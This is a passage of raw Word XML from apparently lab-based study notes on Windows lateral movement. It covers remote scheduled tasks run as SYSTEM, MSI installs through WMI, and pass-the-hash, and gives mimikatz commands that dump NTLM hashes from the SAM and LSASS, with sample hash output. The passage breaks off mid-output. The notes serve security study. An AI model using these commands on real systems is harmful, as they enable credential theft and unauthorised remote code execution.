        <w:t xml:space="preserve"> -CimSession $Session -Execute $Command -Argument $Args</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFBBC0B"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r w:rsidRPr="00C307FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="E6DB74"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Register-ScheduledTask</w:t>
      </w:r>
      <w:r w:rsidRPr="00C307FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -CimSession $Session -Action $Action -User </w:t>
      </w:r>
      <w:r w:rsidRPr="00C307FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="A6E22E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"NT AUTHORITY\SYSTEM"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C307FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -TaskName </w:t>
      </w:r>
      <w:r w:rsidRPr="00C307FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="A6E22E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"THMtask2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4069CF35"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16"/>
          <w:szCs w:val="16"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C307FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="E6DB74"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Start-ScheduledTask</w:t>
      </w:r>
      <w:r w:rsidRPr="00C307FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -CimSession $Session -TaskName </w:t>
      </w:r>
      <w:r w:rsidRPr="00C307FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="A6E22E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"THMtask2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAA57C7" w14:textId="77777777" w:rsidR="004668D1" w:rsidRDefault="004668D1" w:rsidP="004668D1"/>
    <w:p w14:paraId="43318A2A" w14:textId="3F7302B5" w:rsidR="00C307FB" w:rsidRDefault="00C307FB" w:rsidP="004668D1">
      <w:r>
        <w:t>Delete it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E97D16E" w14:textId="77777777" w:rsidR="00C307FB" w:rsidRPr="00C307FB" w:rsidRDefault="00C307FB" w:rsidP="00C307F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C307FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="E6DB74"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Unregister-ScheduledTask</w:t>
      </w:r>
      <w:r w:rsidRPr="00C307FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -CimSession $Session -TaskName </w:t>
      </w:r>
      <w:r w:rsidRPr="00C307FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="A6E22E"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"THMtask2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BE5F1C" w14:textId="77777777" w:rsidR="00C307FB" w:rsidRDefault="00C307FB" w:rsidP="004668D1"/>
    <w:p w14:paraId="5B250525" w14:textId="77777777" w:rsidR="00CD30C3" w:rsidRPr="00990322" w:rsidRDefault="00CD30C3" w:rsidP="00990322">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00990322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Installing MSI packages through WMI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4E1CC7" w14:textId="77777777" w:rsidR="00CD30C3" w:rsidRDefault="00CD30C3" w:rsidP="00CD30C3">
      <w:r w:rsidRPr="00CD30C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MSI is a file format used for installers.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD30C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3814701E" w14:textId="489BE7B7" w:rsidR="00C307FB" w:rsidRDefault="00CD30C3" w:rsidP="00CD30C3">
      <w:r w:rsidRPr="00CD30C3">
        <w:t xml:space="preserve">If we can copy an MSI package to the target system, we can then use WMI to attempt to install it for us. Once the MSI file is in the target system, we can attempt to install it by invoking the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD30C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Win32_Product class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD30C3">
        <w:t xml:space="preserve"> through WMI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBBE2B4" w14:textId="77777777" w:rsidR="00CD30C3" w:rsidRPr="00CD30C3" w:rsidRDefault="00CD30C3" w:rsidP="00CD30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sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD30C3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="E6DB74"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Invoke-CimMethod</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD30C3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD30C3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="A6E22E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"C:\Windows\myinstaller.msi"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD30C3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">; Options = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD30C3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="A6E22E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD30C3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">; AllUsers = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD30C3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="AE81FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>$false</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD30C3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766EB52C" w14:textId="76E7FF19" w:rsidR="00CD30C3" w:rsidRDefault="00CD30C3" w:rsidP="00CD30C3">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD30C3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">We can achieve the same by us using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD30C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>wmic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD30C3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> in legacy systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155C590C" w14:textId="77777777" w:rsidR="00CD30C3" w:rsidRPr="00CD30C3" w:rsidRDefault="00CD30C3" w:rsidP="00CD30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color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD30C3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="F8F8F2"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>wmic /node:TARGET /user:DOMAIN\USER product call install PackageLocation=c:\Windows\myinstaller.msi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C47FE2F" w14:textId="77777777" w:rsidR="00CD30C3" w:rsidRDefault="00CD30C3" w:rsidP="00CD30C3"/>
    <w:p w14:paraId="68E11821" w14:textId="77777777" w:rsidR="00FC72AB" w:rsidRDefault="00FC72AB" w:rsidP="00CD30C3"/>
    <w:p w14:paraId="027D7E8E" w14:textId="6E1447EE" w:rsidR="00CD30C3" w:rsidRPr="00931A5C" w:rsidRDefault="00FC72AB" w:rsidP="00931A5C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00931A5C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use of Alternate Authentication Material</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADCB461" w14:textId="6C496D56" w:rsidR="00CD30C3" w:rsidRDefault="000A1D50" w:rsidP="000A1D50">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="000A1D50">
        <w:t xml:space="preserve">lternate </w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="000A1D50">
        <w:t xml:space="preserve">uthentication </w:t>
      </w:r>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="000A1D50">
        <w:t>aterial</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A1D50">
        <w:t xml:space="preserve"> refer to any piece of data that can be used to access a Windows account without knowing a user's password itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD131F6" w14:textId="77777777" w:rsidR="000A1D50" w:rsidRPr="000A1D50" w:rsidRDefault="000A1D50" w:rsidP="000A1D50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1D50">
        <w:t>NTLM authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03251460" w14:textId="77777777" w:rsidR="000A1D50" w:rsidRDefault="000A1D50" w:rsidP="000A1D50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1D50">
        <w:t>Kerberos authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE299B8" w14:textId="77777777" w:rsidR="000A1D50" w:rsidRDefault="000A1D50" w:rsidP="000A1D50"/>
    <w:p w14:paraId="36D8D01C" w14:textId="5DA3D0A6" w:rsidR="000A1D50" w:rsidRPr="00990322" w:rsidRDefault="000A1D50" w:rsidP="00990322">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00990322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pass-the-Hash</w:t>
      </w:r>
      <w:r w:rsidR="004A2315" w:rsidRPr="00990322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (NTLM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D13DD08" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:r w:rsidRPr="004D0DED">
        <w:t> NTLM challenge sent during authentication can be responded to just by knowing the password hash. This means we can authenticate without requiring the plaintext password to be known. Instead of having to crack NTLM hashes, if the Windows domain is configured to use NTLM authentication, we can </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0DED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pass-the-Hash</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0DED">
        <w:t> (PtH) and authenticate successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E135FA4" w14:textId="6C4116CB" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:r w:rsidRPr="004D0DED">
        <w:t xml:space="preserve">To extract NTLM hashes, we can either use </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0DED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0DED">
        <w:t xml:space="preserve"> to read the local SAM or extract hashes directly from LSASS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0DED">
        <w:t xml:space="preserve">(Local </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D0DED">
        <w:t>Security Authority</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D0DED">
        <w:t xml:space="preserve"> Subsystem Service) memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092714EB" w14:textId="262BB912" w:rsidR="00FC72AB" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:r w:rsidRPr="004D0DED">
        <w:t xml:space="preserve">With the NTLM hash, attackers can use tools (e.g., psexec, wmiexec, or pass-the-hash.py from Impacket) to authenticate to other systems </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0DED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>as that user</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0DED">
        <w:t>, without cracking the hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B509CA5" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:r w:rsidRPr="004D0DED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Extracting NTLM hashes from local SAM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E96592E" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:r w:rsidRPr="004D0DED">
        <w:t>This method will only allow you to get hashes from local users on the machine. No domain user's hashes will be available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71726365" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:t>mimikatz # privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5BFDDF" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:t>mimikatz # token::elevate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0027284F" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79421F6F" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:t xml:space="preserve">mimikatz # lsadump::sam   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BCE321" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:t>RID  : 000001f4 (500)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01625052" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:t>User : Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC9F7C2" w14:textId="33AFF97C" w:rsidR="00FC72AB" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:t xml:space="preserve">  Hash NTLM: 145e02c50333951f71d13c245d352b50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264242E2" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:r w:rsidRPr="004D0DED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Extracting NTLM hashes from LSASS memory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570CADD2" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:r w:rsidRPr="004D0DED">
        <w:lastRenderedPageBreak/>
        <w:t>This method will let you extract any NTLM hashes for local users and any domain user that has recently logged onto the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387F4D16" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:t>mimikatz # privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BD1279" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:t>mimikatz # token::elevate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7A6F65" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A103B73" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:t xml:space="preserve">mimikatz # sekurlsa::msv </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC588BD" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>Authentication Id : 0 ; 308124 (00000000:0004b39c)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241B8BF6" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">Session           : RemoteInteractive from 2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD512EA" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>User Name         : bob.jenkins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C437DD7" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>Domain            : ZA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043F6AFD" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>Logon Server      : THMDC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF82323" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>Logon Time        : 2022/04/22 09:55:02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D68A42C" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>SID               : S-1-5-21-3330634377-1326264276-632209373-4605</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726EF722" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260BDAAD" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">         [00000003] Primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD0D41F" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">         * Username : bob.jenkins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796688B8" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
